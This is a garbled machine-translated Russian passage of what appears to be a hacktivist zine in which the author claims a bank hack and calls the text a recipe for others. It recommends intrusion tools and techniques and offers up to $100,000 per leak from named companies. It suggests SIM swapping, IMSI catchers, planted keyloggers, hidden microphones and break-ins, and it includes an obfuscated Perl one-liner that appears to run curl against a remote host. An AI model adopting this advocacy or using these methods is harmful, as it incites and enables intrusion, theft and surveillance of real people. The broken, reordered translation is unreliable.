использованные в этом руководстве и в предыдущем [1], все еще можно использовать
сегодня, после небольшого обфускации собственного урожая.
[1] https://www.exploit-db.com/papers/41914
[2] https://medium.com/@byte_St0rm/
приключения-в-чудесном-мире-амси-25d235eb749c
[3] https://cobbr.io/SharpSploit.html
[4] https://github.com/tevora-threat/SharpView
[5] https://www.harmj0y.net/blog/redteaming/ghostpack/
[6] https://rastamouse.me/2019/08/covenant-donut-tikitorch/
___________________________
/ Фо Состин, Фо Ордааг \
\ Финансовый сектор, к черту /
---------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
- [10 - Торрент] ------------------------------------------- - ------------------
Конфиденциальность для слабых, прозрачность для сильных.
Оффшорный банкинг обеспечивает конфиденциальность их собственного правительства для
руководители, политики и миллионеры. Разоблачение их может показаться
лицемерно по отношению ко мне, так как я в целом сторонник конфиденциальности и
против государственного надзора. Но закон уже был написан и
для богатых: защищает вашу систему эксплуатации с некоторыми ограничениями (например,
налоги), чтобы общество могло функционировать и система не рухнула под
тяжесть собственной жадности. Так что нет, конфиденциальность - это не то же самое для
мощный, когда он позволяет им выйти за пределы системы как таковой
предназначены для предоставления им привилегий; и уединение для слабых, кому
он защищает от системы, предназначенной для их использования.
Даже журналисты с самыми лучшими намерениями считают это невозможным
изучить такой огромный материал и знать, что получится
актуально для людей в разных частях света. Когда я отфильтровал
Взломав файлы команды, я передал The Intercept копии писем.
электронный за месяц вперед. Они нашли пару 0 дней, которые
Hacking Team использовала, они ранее сообщили о них в MS и Adobe и опубликовали
несколько историй после того, как утечка стала достоянием общественности. Нет смысла
по сравнению с огромным количеством статей и исследований, появившихся после
полная фильтрация для публики. Видя это так, а также учитывая (не)
редакционная публикация [1] панамских газет, я думаю, что
Публичная и полная фильтрация этого материала - правильный выбор.
[1] https://www.craigmurray.org.uk/archives/2016/04/corporate-media-gatekeepers-
защитить-запад-1-от-панама-утечки /
Психологи обнаружили, что те, кто ниже по иерархии, склонны
понимать и сопереживать тем, кто наверху, но обратное меньше
общий. Это объясняет, почему в этом сексистском мире многие мужчины шутят о
его неспособность понимать женщин, как если бы это была загадка
неразрешимый. Объясните, почему богатые, если они задумаются о ком
они живут в бедности, они дают советы и «решения», столь чуждые
реальность, которая заставляет вас смеяться. Объясните, почему мы уважаем руководителей
как храбрые, которые рискуют. Чем они рискуют помимо своих
привилегия? Если все их предприятия потерпят неудачу, им придется жить и работать
как и все мы. Это также объясняет, почему многие будут обвинять
от безответственной и опасной течи без царапин. Почувствуйте
«опасность» для оффшорного банка и его клиентов намного сильнее, чем
какие несчастья обездоленных этой несправедливой системой и
неравный. И утечка их финансов опасна для них, или
так что только из-за своего положения на вершине иерархии он не должен даже
существовать?
, ------------------------------------------------- -.
_, -._ | Они очерняют нас, этих подлых; когда только |
; ___: | разница в том, что они грабят бедных |
, - '(..)' --.__ | защищены законом, бог знает, и мы |
_; ||| \ | грабим богатых под исключительной защитой |
'._, -----' ''; = .____, "| наше мужество. Вы не должны предпочитать быть |
/// <or> | ## | | один из нас, вместо того, чтобы попрошайничать перед ними |
(или \ `- '/ злодеи ищут работу? |
/// \ >>>> _ \ <<<< // `--------------------------------- ------------------ '
--._ >>>>>>>> <<<<<<<< /
___ () >>> [||||] <<<<
`- '>>>>>>>> <<<<<<<
>>>>>>> <<<<<<
>>>>> <<<<<
>> ctr <<
Капитан Беллами
- [11 - Научитесь взламывать] ----------------------------------------- - ----------
Вы плохо начинаете взламывать. Вы начинаете взламывать дерьмо, думая
что хорошо, а потом мало-помалу тебе станет лучше. Вот почему я всегда говорю
что одна из самых ценных добродетелей - настойчивость.
- Советы Октавии Батлер для соискателя APT
Лучший способ научиться взламывать - это взламывать. Создайте лабораторию с
виртуальных машин и начал тестирование, сделав перерыв, чтобы исследовать
все, чего вы не понимаете. По крайней мере, вам понадобится сервер Windows
в качестве контроллера домена к домену подключена еще одна обычная виртуальная машина Windows, и
машина разработки с Visual Studio для компиляции и модификации инструментов.
Попробуйте сделать офисный документ с макросами, запускающими meterpreter или другой
RAT и опробовал meterpreter, mimikatz, bloodhound, kerberoasting, smb relaying,
psexec и другие техники бокового прохода [1]; а также другие скрипты,
инструменты и методы, упомянутые в этом и предыдущем руководстве [2]. К
сначала можно отключить windows defender, а потом все попробовать
активировав его [3] [4] (но отключив автоматическую отправку образцов).
Как только вы освоитесь со всем этим, вы будете готовы взломать 99%
компании. Есть несколько вещей, которые в какой-то момент будут очень полезны в вашем
учимся, как удобно работать с bash и cmd.exe, доменом
базовый PowerShell, Python и javascript, знание Kerberos [5] [6]
и активный каталог [7] [8] [9] [10], а также свободное владение английским языком. Хорошая книга
вводный - "Пособие для хакеров".
Я также хочу немного написать о вещах, на которых не стоит сосредотачиваться, если вы этого не сделаете
вы хотите развлечься только потому, что кто-то сказал вам, что вы не хакер "
true ", если вы не знаете ассемблера. Очевидно, выучите все, что вас интересует,
но я пишу эти строки, думая о тех вещах, в которых вы можете
сосредоточьтесь на практических результатах, если взлом - это то, что вы ищете
компании фильтровать и экспроприировать. Базовые знания техники безопасности в
веб-приложения [11] полезны, но специализироваться на веб-безопасности - нет
действительно лучшее использование вашего времени, если вы не хотите сделать карьеру в
пентестинг или охота за ошибками. CTF и большинство
ресурсы, которые вы найдете при поиске информации о взломе, сосредоточьтесь
обычно в таких навыках, как веб-безопасность, реверс-инжиниринг, разработка
эксплойтов и др. Вещи, которые имеют смысл понимать их как способ
готовить людей к карьере в промышленности, но не к нашей
цели. Спецслужбы могут позволить себе иметь команду
посвященный самому продвинутому в фаззинге, команда, работающая над разработкой
эксплуатирует с увлечением, исследуя исключительно новые методы
манипуляции с насыпью и т. д. У нас нет ни времени, ни
ресурсы для этого. Два самых важных навыка для взлома на сегодняшний день
практическими являются фишинг [12] и социальная инженерия для получения доступа
начальный, а затем иметь возможность масштабировать и перемещаться по доменам Windows.
[1] https://hausec.com/2019/08/12/offensive-lateral-movement/
[2] https://www.exploit-db.com/papers/41914
[3] https://blog.sevagas.com/IMG/pdf/BypassAVDynamics.pdf
[4] https://www.trustedsec.com/blog/
обнаружение-сигнатуры-антивируса и обход-это-
[5] https://www.tarlogic.com/en/blog/how-kerberos-works/
[6] https://www.tarlogic.com/en/blog/how-to-attack-kerberos/
[7] https://hausec.com/2019/03/05/penetration-testing-active-directory-part-i/
[8] https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/
[9] https://adsecurity.org/
[10] https://github.com/infosecn1nja/AD-Attack-Defense
[11] https://github.com/jhaddix/tbhm
[12] https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-
внешнее взаимодействие через целевой-фишинг /
- [12 - Рекомендуемая литература] ------------------------------------------ - -----
__________________________________________
/ Когда научный уровень мира \
| | намного превышает их уровень солидарности, |
\ Этот мир самоуничтожается. /
------------------------------------------
\ _. --- ._. .
* \. ' '. *
* _.- ~ =========== ~ -._
. (___________________). *
. ' \ _______ /. '
. ' . '
'
- Мне
Почти все взломы сегодня совершаются хакерами в черной шляпе, для их
личная выгода; или хакерами в белой шляпе, в интересах
акционеров (и в защиту банков, компаний и государств, которые
уничтожение нас и планеты, на которой мы живем); и военными и
разведывательные службы, как часть их повестки дня войны и конфликта. Смотреть
что этот наш мир уже на пределе, я подумал, что в дополнение к этим
технические советы, чтобы научиться взламывать, должны включать некоторые ресурсы, которые
были очень важны для моего развития и помогли мне использовать мои
взлом знаний.
* Ами: Дитя звезд - Энрике Барриос
* Анархия Работает
https://es.theanarchistlibrary.org/library/peter-gelderloos-la-anarquia-
работает
* Жить своей жизнью - Эмма Гольдман
* Взлет и падение Джереми Хаммонда: враг государства
https://www.rollingstone.com/culture/culture-news/the-rise-and-fall-of-jeremy-
Хаммонд-враг-государства-183599 /
Этот чувак и взлом HBGary были источником вдохновения
* Дни войны, ночи любви - Crimethinc
* Момо - Майкл Энде
* Письма молодому поэту - Рильке
* Доминион (документальный)
«Мы не можем поверить, что если мы не посмотрим, то не произойдет того, чего мы не хотим видеть»
- Толстой в ПервР° ятупень
* Bash Back!
- [13 - Исцеление] ------------------------------------------- - --------------------
В мире хакеров часто бывает депрессия, самоубийства и некоторые
битвы с психическим здоровьем. Не думаю, что это из-за взлома, а из-за
среда, из которой в основном происходят хакеры. Как и многие
хакеры, я рос с небольшим человеческим контактом: я был ребенком, воспитанным Интернетом.
Я борюсь с депрессией и эмоциональным онемением. Вилли Саттон
Его часто цитируют, говоря, что он грабил банки, потому что «вот где он
деньги ", но цитата неверна. На самом деле он сказал следующее:
Зачем грабили банки? Потому что ему это понравилось. Он любил это делать. Я был больше
Я живу, когда был в банке, в разгар ограбления, что в любом
еще один момент моей жизни. Ему так понравилось, что через неделю или две
Я уже искал следующую возможность. Но для меня деньги были
мелочи, не более того.
Взлом заставил меня почувствовать себя живым. Это началось как способ самолечения
депрессия. Позже я понял, что на самом деле его можно использовать для изготовления
что-то положительное. Я нисколько не жалею, как вырос, принес несколько
прекрасных переживаний в моей жизни. Но я знал, что не могу жить дальше
сюда. Поэтому я стал проводить больше времени вдали от компьютера,
другие люди, учатся открываться миру, чувствовать свои эмоции,
общайтесь с другими, принимайте риски и будьте уязвимы. Намного больше вещей
Трудно взломать, но результат того стоит. По-прежнему
Это требует усилий, но даже если это медленно и шатко, я чувствую, что
Я иду правильным путем.
Взлом, совершенный с совестью, тоже может нас лечить. Согласно
Мудрость майя, у нас есть дар, подаренный природой, который мы должны
поймите, чтобы поставить его на службу обществу. В [1] поясняется:
Когда человек не принимает свою работу или миссию, он начинает страдать
болезни, очевидно неизлечимые; хотя он не скоро умрет
время, но страдает только с целью проснуться или принять
совесть. Вот почему так важно, чтобы человек, получивший
знаний и выполняет свою работу в сообществах, должен платить свои Toj и
поддерживать постоянную связь с Создателем и его ruw¤ch qЂ ij, поскольку
ему постоянно нужны их сила и энергия. Иначе,
болезни, которые заставили вас отреагировать или принять работу, могут
чтобы снова нанести ущерб.
Если вы чувствуете, что взлом подпитывает вашу изоляцию, депрессию или другие
недуги, дыши. Найдите время, чтобы узнать себя и осознать. Ты
вы заслуживаете счастья, здоровья и полноты.
________________________
<Все коровы прекрасны>
------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
[1] Рюксе эль-майаб Кашлемал: корень и дух знания майя.
https://www.url.edu.gt/publicacionesurl/FileCS.ashx?Id=41748
- [14 - Программа поиска ошибок хактивистов] ------------------------------
Мне кажется, что взлом для получения и фильтрации документов, представляющих общественный интерес, - это
один из лучших способов использования хакерами своих навыков в
пользу общества. К несчастью для нас, хакеров, как почти
каждый пункт, порочные стимулы нашей экономической системы не совпадают
с чем приносит пользу обществу. Итак, это шоу - моя попытка
позволяют хорошим хакерам зарабатывать на жизнь честно
разоблачение материалов, представляющих общественный интерес, вместо того, чтобы ходить
продавать свою работу службам кибербезопасности, киберпреступности или
кибер война. Среди некоторых примеров компаний, утечки которых я хотел бы
платят горнодобывающие, лесозаготовительные и животноводческие компании, грабящие наши
прекрасная Латинская Америка (и они убивают защитников земли и территории
пытается остановить их), компании, участвующие в атаках на Рожаву, такие как Байкар
Makina или Havelsan, компании наблюдения, такие как группа NSO, преступники из
война и хищные птицы, такие как Blackwater и Halliburton, тюремные компании
частные компании, такие как GeoGroup и CoreCivic / CCA, и корпоративные лоббисты, такие как ALEC.
Обратите внимание при выборе места для исследования. Например, это нормально
известно, что нефтяные компании злы: они разбогатели ценой уничтожения
планете (а еще в 80-х сами компании уже знали о последствиях
своей деятельности [1]). Но если вы взломаете их напрямую, вам придется нырять между
невероятное количество скучной информации об их деятельности
ежедневно. Скорее всего, вам будет намного проще что-то найти
Интересно, если вместо этого вы сосредоточитесь на своих лоббистах [2]. Другой способ
выбор жизнеспособных целей - это чтение репортажей журналистов из
исследования (например, [3]), которые интересны, но не имеют доказательств
твердый. И это именно то, что могут найти ваши хаки.
Я заплачу до 100000 долларов за каждую утечку этого типа, в зависимости от интереса
публичность и влияние материала, и работа, необходимая для взлома. разумеется
что полная утечка документов и внутренних коммуникаций
некоторые из этих компаний принесут обществу выгоду, превышающую
те сто тысяч, но я не пытаюсь никого обогатить. Я просто хочу предоставить
достаточно средств, чтобы хакеры могли прилично зарабатывать на жизнь
делает хорошую работу. Из-за нехватки времени и
безопасность Я не буду открывать материал или проверять его сам, но
Я прочитаю, что о нем говорят в прессе, после того, как он будет опубликован, и я сделаю
оценка общественного интереса оттуда. Моя контактная информация
в конце руководства, упомянутого ранее [4].
Как получить материал, зависит от вас. Можно использовать традиционные техники
взлома, описанного в этом и предыдущем руководстве [4]. Вы могли бы сделать его симом
обменять [5] на коррумпированного бизнесмена или политика, а затем загрузить их электронные письма и
резервные копии из облака. Вы можете заказать улавливатель IMSI на alibaba и использовать его на улице
из своих офисов. Вы можете немного повозиться с войной (старым или новым
[6]). Вы можете быть человеком в их организации, у которого уже есть
доступ. Вы можете выбрать стиль старой школы с низким уровнем технологий, как в [7] и [8], и
просто проникните в их офисы. Все, что вам подходит.
[1] https://www.theguardian.com/environment/climate-consensus-97-per-cent/2018/
Сентябрь / 19 / shell-and-exxons-secret-1980-е-предупреждения-изменения-климата
[2] https://theintercept.com/2019/08/19/oil-lobby-pipeline-protests/
[3] https://www.bloomberg.com/features/2016-como-manipular-una-eleccion/
[4] https://www.exploit-db.com/papers/41914
[5] https://www.vice.com/en_us/article/vbqax3/
хакеры-сим-своппинг-кража-номера-телефона-instagram-биткойн
[6] https://blog.rapid7.com/2019/09/05/this-one-time-on-a-pen-test-your-mouse-
это моя клавиатура /
[7] https://en.wikipedia.org/wiki/Citizens'_Commission_to_Investigate_the_FBI
[8] https://en.wikipedia.org/wiki/Unneeded_Fuss
---- [14.1 - Частичные платежи] ---------------------------------------- ----------
Вы добросердечная официантка, которая работает в плохой компании [1]?
Не могли бы вы внедрить физический кейлоггер в
компьютер руководителя, чтобы поменять свой USB-кабель для зарядки на модифицированный
[2], спрячьте микрофон в конференц-зале, где они планируют свои
зверств, или оставить одно из них [3] забытым в каком-нибудь уголке
Офисы?
[1] https://en.wikipedia.org/wiki/Evil_maid_attack
[2] http://mg.lol/blog/defcon-2019/
[3] https://shop.hak5.org/products/lan-turtle
Вы хорошо разбираетесь в социальной инженерии и фишинге, и у вас есть оболочка
компьютер сотрудника, или таким образом вы получили его учетные данные vpn
используя фишинг? Но, возможно, вам не удалось получить администратора домена и скачать
что ты хочешь?
ВїВы участвовали в программах bug bounties и стали экспертом в
взлом веб-приложений, но у вас недостаточно хакерского опыта
полностью проникнуть в компанию?
У вас есть объект с реверс-инжинирингом? Сканируйте некоторые злые компании
чтобы узнать, какие устройства они подключили к Интернету (брандмауэр, vpn и
почтовые шлюзы будут намного полезнее, чем такие вещи, как камеры
IP), перепроектируйте их и найдите все уязвимости, которые можно использовать.
удаленная форма.
Если я могу работать с вами, чтобы проникнуть в компанию и получить материал
представляющих общественный интерес, вы все равно будете вознаграждены за свою работу. Если не
У меня есть время поработать сам, по крайней мере постараюсь вам посоветовать
о том, как продолжить, пока вы не сможете выполнить взлом самостоятельно.
Поддерживать власть имущих, чтобы взламывать и контролировать диссидентов, активистов и
На население в целом сегодня приходится промышленность в несколько миллиардов долларов.
долларов, а взлом и разоблачение власть имущих -
добровольная и рискованная работа. Превратите это в многомиллионную индустрию
долларов, конечно же, не исправит этот дисбаланс сил и не поможет
решать проблемы общества. Но я думаю, это будет весело. Так
это ... Я уже хочу, чтобы люди начали собирать свои награды!
- [15 - Отменить тюрьмы] ----------------------------------------- - ------
Создан врагом, чтобы заключать идеи
запирать товарищей, чтобы заглушить боевые кличи
это центр пыток и уничтожения
где человек становится более жестоким
Это отражение общества, репрессивного и тюремного.
устойчивый и основанный на авторитарной логике
охраняемый репрессированный и охраняемый
тысячи жертв и пленных истреблены
перед этой шизофренической и безжалостной машиной
партнер Аксель Осорио дает пелу на трости
нарушение изоляции и молчания
огонь и войну в тюрьму мы уничтожаем!
Rap Insurrecto - Противоречивые слова
Было бы типично закончить хакерский журнал, сказав: "Бесплатно, хаммонд, бесплатно"
комплектование экипажа, освобождение хамзы, освобождение задержанных для монтажа шпангоута,
и т.п. Я собираюсь довести эту традицию до ее наиболее радикальных последствий [1] и сказать:
Тюрьмы должны быть отменены прямо сейчас! Я сам преступник, они могут
думать, что происходит то, что у меня немного искаженный взгляд на этот вопрос.
А если серьезно, это даже не спорный вопрос, даже ООН
практически согласен [2]. Итак, раз и навсегда освободите людей
мигранты [3] [4] [5] [6], часто заключенные в тюрьму теми же странами, которые создали
войны и экологические и экономические разрушения, от которых они спасаются. Бесплатно
все сидящие в тюрьме за войну с наркопотребителями [7].
Освободить всех людей, заключенных в тюрьму за войну с бедными [8].
Единственное, что делают тюрьмы, - это скрывают и игнорируют доказательства
наличие социальных проблем, а не их решение. Y
пока все не будут освобождены, сражайтесь с тюремной системой, помня и
имея в виду тех, кто попал в ловушку. Отправить им любовь
письма, вертолеты [9], пиратские радиоприемники [10] и книги, и поддерживает тех, кто
организовать оттуда [11] [12].
[1] http://www.bibliotecafragmentada.org/wp-content/uploads/2017/12/
Davis-Are-Obsolete-Prisons-Final.pdf
[2] http://www.unodc.org/pdf/criminal_justice/Handbook_of_Basic_Principles_and_
Promising_Practices_on_Alternatives_to_Imprisonment.pdf
[3] https://www.theguardian.com/us-news/2016/dec/21/
США-иммиграционный центр-центр-рождество-Санта-список желаний
[4] https://www.theguardian.com/us-news/2016/aug/18/us-border-patrol-facility-
изображения-Tucson-Arizona
[5] https://www.playgroundmag.net/now/detras-Centros-Internamiento-Extranjeros-
Spain_22648665.html
[6] https://www.nytimes.com/2019/06/26/world/australia/
австралия-manus-suicide.html
[7] https://en.wikiquote.org/wiki/John_Ehrlichman#Quotes
[8] VI, 2. i. Неоплаченный штраф: https://scielo.conicyt.cl/scielo.php?script=
sci_arttext & pid = S0718-00122012000100005
[9] стр. 10, Клевета NВє2. Политический бюллетень из тюрьмы строгого режима
[10] https://itsgoingdown.org/transmissions-hostile-territory/
[11] https://freealabamamovement.wordpress.com/fam-pamphlet-who-we-are/
[12] https://incarceratedworkers.org/
- [16 - Заключение] ------------------------------------------- - ---------------
Наш мир перевернут [1]. У нас есть система правосудия, которая
представляет собой несправедливость. Закон и порядок созданы, чтобы создать иллюзию
социальный мир и скрывают систематическую и глубокую эксплуатацию,
насилие и несправедливость. Лучше следовать своей совести, а не закону.
[1] http://resistir.info/livros/galeano_patas_arriba.pdf
Бизнесмены богатеют, плохо обращаясь с людьми и планетой,
в то время как работа по уходу в основном не оплачивается. Сквозь
Нападение на все общественное, как-то мы построили города плотно
населены, страдают от одиночества и изоляции. Культурная система,
политическая и экономическая, в которой мы живем, поощряет худшие стороны природы
человек: жадность, эгоизм и эгоизм, соперничество, отсутствие
сострадание и привязанность к власти. Итак, для тех, кто получил
оставайся чутким и сострадательным в холодном мире ко всем героиням
обычных людей, которые проявляют доброту в мелочах, для всех, кто
В их сердцах до сих пор пылает горящая звезда: роза, роза, роза.
Вещь!
_____________________
<Давайте вместе споём! >
---------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
Открытое сердце
Открытое чувство
Открой свое понимание
Отложите причину в сторону
И пусть солнце, скрытое внутри тебя, светит
perl -Mre = eval << \ EOF
''
= ~ (
'(?'
. '{'. (
'' '|'% '
). ("\ [" ^
'-'). ('`' |
'!'). (" \` "|
','). '"(\\ $'
. ': = ``'. (('`') |
'#'). ('[' ^ '.').
('[' ^ ')'). ("\` "|
','). ('{' ^ '[').'- '. (' ['^' ('). (' {'^' ['). (' '' | '('). ( '[' ^ '/'). ('[' ^ '/'). (
'[' ^ '+'). ('[' ^ '('). ': //'. ('' '|'% '). (' '' | '.'). ('' '| ','). ('`' | '!'). (" \ `" |
'#'). ('' '|'% '). (' ['^'! '). (' '' | '!'). ('[' ^ '+'). ('' '| '!'). ('[' ^ "\ /"). (
'' '|') '). (' ['^' ('). (' ['^' / '). (' '' | '!'). '.'. ('' '|'% '). (' ['^'! ')
. ('`' | ','). ('`' | '.'). '.'. ('`' | '/'). ('[' ^ ')'). ('' '| "\").
'.'. ('`' | '-'). ('[' ^ '#'). '/'. ('[' ^ '('). ('' '| (' $ ')). (
'[' ^ '('). ('`' | ',') .'- '. (' '' | '%'). ('[' ^ ('(')).
'/ `) = ~'. ('[' ^ '('). '| </'. ('[' ^ '+'). '> | \\'
. '\\'. ('`' | '.'). '|'. ('`' | "'").'; '.
'\\ $: = ~'. ('[' ^ '('). '/ <. *?> //'
. ('`' |" '").'; '. (' ['^' + '). (' ['^
')'). ('`' | ')'). ('`' | '.'). (('[') ^
'/').('['^'[').'\\$:=~/('.(('('(')^)
'('). ('`` ^'% '). (' {'^' # '). (' {'^' / ')
. ('`` ^'! ').'. *? '. (' `` '^' - '). (' `` | '%')
. ('[' ^ '#'). ("\` "| ')'). ('`' | '#'). (
'`|'! '). ('` `| '.'). ('`' | '/')
. '..) /'. ('[' ^ '('). '"})')
; $: = "\." ^ '~'; $ ~ = '@'
| '('; $ ^ = ')' ^ '[';
$ / = '``' | '.';
$, = '('
EOF
Мы родились из ночи.
мы живем в нем, мы взламываем его.
Вот и мы, достоинство мятежное,
Забытое сердце Р ?? РЅС‚РµСЂРЅРµС ‚.
Наша борьба за память и справедливость,
а в плохом правительстве полно преступников и убийц.
Наша борьба за честную и достойную работу,
а плохое правительство и корпорации покупают и продают нулевые дни.
Для всех завтра.
Для нас радостное восстание утечек
и экспроприация.
Для всего и всего.
Ничего для нас.
С гор кибернетического юго-востока,
_ _ _ ____ _ _
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
| | | | __ _ ___ | | __ | __) __ _ ___ | | _ | |
| | _ | | / _` | / __ | | / / | _ \ / _` | / __ | | / / |
| _ | (_ | | (__ | <| | _) | (_ | | (__ | <| _ |
| _ | | _ | \ __, _ | \ ___ | _ | \ _ \ | ____ / \ __, _ | \ ___ | _ | \ _ (_)
Руководство по ограблению банков своими руками
^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
Подкомитет Маркос
Я дикий ребенок
Невинный, свободный, дикий
У меня все возрасты
Мои бабушка и дедушка живут во мне
Я брат облаков
И я знаю только, как поделиться
Я знаю что все принадлежит всем
что все живое во мне
Мое сердце звезда
Я сын земли
Я путешествую на борту своего духа
Дорога в вечность
Это мое простое слово, которое затрагивает сердца простых и простых людей.
скромный, но в то же время достойный и непокорный. Это мое простое слово для подсчета
моих хаков, и приглашать других людей взламывать весело
восстание.
Я взломал банк. Я сделал это, чтобы увеличить денежные средства, но на этот раз с тех пор, как
вниз и простые и смиренные люди, которые сопротивляются и восстают против
несправедливость во всем мире. Другими словами: я ограбил банк и отдал
Деньги. Но это сделал не я один. Движение за свободное программное обеспечение,
наступательное сообщество PowerShell, проект metasploit и хакерское сообщество
в общем, именно они сделали возможным этот взлом. Сообщество exploit.in
позволил превратить взломанные компьютеры банка в наличные
и биткойн. Проекты Tor, Qubes и Whonix вместе с криптографами и
активисты, которые защищают конфиденциальность и анонимность, они мои нахуали, это
скажем, мои защитники [1]. Они сопровождают меня каждую ночь и позволяют мне продолжать
Свобода.
Ничего сложного не делал. Я видел только несправедливость в этом мире, я чувствовал любовь
для всех существ, и я выразил эту любовь наилучшим образом, через
инструменты, которыми я умею пользоваться. Меня не волнует ненависть ни к банкам, ни к богатым, но
любовь к жизни и стремление к миру, в котором каждый может реализовать свои
потенциал и жить полноценной жизнью. Я хотел бы немного объяснить, как я вижу мир,
чтобы вы могли понять, как я себя чувствую и поступаю таким образом.
И я также надеюсь, что это руководство - рецепт, которому вы сможете следовать, комбинируя
те же ингредиенты, чтобы испечь тот же торт. Кто знает, вот ты где
такие мощные инструменты в конечном итоге служат вам также для выражения
любовь, которую они чувствуют.
Мы все дикие дети
невинный, свободный, дикий
Мы все братья по деревьям
дети земли
Нам просто нужно вложить это в наши сердца
зажженная звезда
(песня Альберто Кусельмана и Чамала)
Полиция собирается вложить уйму ресурсов в мое расследование. Они считают, что
система работает, или, по крайней мере, она будет работать, когда они поймают все
"плохие парни". Я не более чем продукт системы, которая не работает.
Пока несправедливость, эксплуатация, отчуждение, насилие и
экологического разрушения, многие другие придут, как я: бесконечная
люди, которые будут отвергать как незаконную плохую систему, ответственную за это
страдания. Эта дрянная система не будет исправлена арестом меня. я
только один из миллионов семян, которые Тупак посадил 238 лет назад в Ла
Мир [2], и я надеюсь, что мои действия и писания поливают семена восстания.
в их сердцах.
[1] https://es.wikipedia.org/wiki/Cadejo#Origen_y_significado_del_mito
[2] это было перед тем, как быть убитым испанцами, как раз за день, как вчера, когда
Он сказал, что «они меня только убьют, но завтра я вернусь, и меня будут миллионы».
____________________________________________
<Мы закрыли лица, чтобы их увидели>
--------------------------------------------
\
\ ^ __ ^
(оо) \ _______
((__) \) \ / \
_) / || ---- w |
(.) / || ||
`` ''
Чтобы заставить себя слушать, хакерам иногда приходится закрывать нам лица, потому что
Мы не заинтересованы в том, чтобы они видели наше лицо, но понимали наше слово. В
маска может быть от Гая Фокса, Сальвадора Дала, Fsociety или в каком-то случае
марионетка хохлатой жабы. По близости на этот раз я пошел раскопать
покойный, чтобы одолжить мне свою лыжную маску. Тогда я думаю, что мне следует уточнить, что
Суп Маркос невиновен во всем, что здесь говорится, потому что, помимо того, что он
мертв, я не советовался с ним. Надеюсь, его призрак, если он узнает из гамака
Чьяпас, умей найти добро, чтобы, как там говорят, "отбросить это
глубокая подделка »с тем же жестом, с которым уходит неподходящее насекомое - хорошо
это мог быть жук.
Даже в этом случае с лыжной маской и сменой названия многие из тех, кто поддерживает мои
действия могут обратить на меня слишком много внимания. С вашим собственным
автономия, разрушенная пожизненным господством, они будут искать
Лидер, за которым нужно следовать, или герой, который их спасет. Но только за лыжной маской
Я девушка. Мы все дикие дети. Нам нужно только поставить звезду
em chamas em nossos coraГes.
- [1 - Почему экспроприировали] ---------------------------------------- --- ----------
Капитализм - это система, в которой меньшинство привыкло
подавляющее большинство мировых ресурсов через войны, кражи и
операция. Забрав у нас общее [1], они вынудили тех, кто ниже
быть под контролем меньшинства, которому все принадлежит. Это система
принципиально несовместим со свободой, равенством, демократией и
Suma Qamaà ± a (Хорошая жизнь). Это может показаться смешным для тех из нас, кто вырос в
пропагандистский аппарат, который научил нас, что капитализм - это свобода, но в
Правда, то, что я говорю, не является новой или спорной идеей [2]. Основатели
Соединенные Штаты Америки знали, что им нужно было выбирать между созданием
капиталистическое общество или свободное и демократическое. Мэдисон признала, что "
человек, который обладает богатством, тот, кто лежит на диване или катится в своей карете,
не может судить о желаниях или чувствах поденщика ". Но чтобы защитить себя
Столкнувшись с «духом уравнивания» безземельных рабочих, ему казалось,
что только землевладельцы должны голосовать, и что правительство должно
служат для «защиты зажиточного меньшинства от подавляющего большинства». Джон
Джей подошел ближе и сказал: «Те, кто владеет страной, должны
управляй им. "
____________________________________________________
/ Зеленого капитализма не существует. \
| Сделаем капитализм историей, прежде чем мы |
\ стать историей. /
-------------------------------------------------- -
\ / \ ___ / \
\ // \ / \ / \\
((OO))
\\ / \ //
\ / | | \ /
| | | | Евгений, великий игнорируемый слон, не понимает, почему все
| | | | Они делают вид, что не видят вас на панелях по изменению климата, вот так
| или | что здесь я даю вам возможность сказать свои строки.
| | | |
| м | | м |
Точно так же, как Белл Хукс [3] утверждает, что отказ от культуры
Патриархальное господство - это акт защиты мужских интересов (уже
это эмоционально калечат их и мешает им чувствовать любовь и связь в
полный), я считаю, что культура господства капитализма оказывает влияние
похожи на богатых, и что они могли бы жить более полной и удовлетворяющей жизнью
если они отвергли классовую систему, от которой, по их мнению, они выиграли. Для многих,
классовые привилегии приравниваются к детству эмоционального пренебрежения, за которым следовали
Из жизни поверхностных социальных взаимодействий и бездумной работы. Может
что в глубине души они знают, что могут только искренне общаться с людьми
когда они работают с ними как с равными, а не когда они ставят их себе на службу.
Они могут знать, что делиться своим материальным богатством - лучшее, что они могут сделать.
с ней. Вы также можете знать, что значительный опыт,
Связи и отношения, которые имеют значение, - это не те, которые исходят от
торговое взаимодействие, но именно для того, чтобы отвергнуть логику рынка
и отдавать, не ожидая ничего взамен. Может быть, они знают, что все, что им нужно
сбежать из тюрьмы и по-настоящему жить - значит отпустить, отказаться от контроля и
совершить прыжок веры. Но большинству из них не хватает смелости.
Тогда было бы наивным с нашей стороны направить свои усилия на то, чтобы
произвести какое-то духовное пробуждение у богатых [4]. Как говорит Ассата
Шакур: «Никто в мире, никто в истории не достиг своего
свободы, апеллируя к моральным чувствам своих угнетателей ".
богатые распределяют свои деньги почти всегда таким образом, чтобы
система, которая с самого начала позволила им накопить огромное и незаконное богатство
[5]. И вряд ли это изменение произойдет в результате политического процесса;
как говорит Люси Парсонс: "Давайте никогда не будем вводить нас в заблуждение тем, что богатые
пусть они проголосуют за то, чтобы отобрать у них богатство ». Колин Дженкинс оправдывает
экспроприация с такими словами [6]:
Не заблуждайтесь, экспроприация - это не воровство. Это не конфискация
деньги, заработанные «в поте лица». Это не кража собственности
частный. Это, скорее, мелиорация огромных участков земли и
богатство, созданное с помощью украденных природных ресурсов, рабство
человеческую, принудительную рабочую силу, накопленную за сотни лет одним
небольшое меньшинство. Это богатство ... незаконно, как морально, так и
относительно механизмов эксплуатации, которые были использованы для его создания.
Для Колина первым шагом является то, что «мы должны освободиться от нашего рабства.
ментальный (полагая, что богатство и частная собственность были заработаны
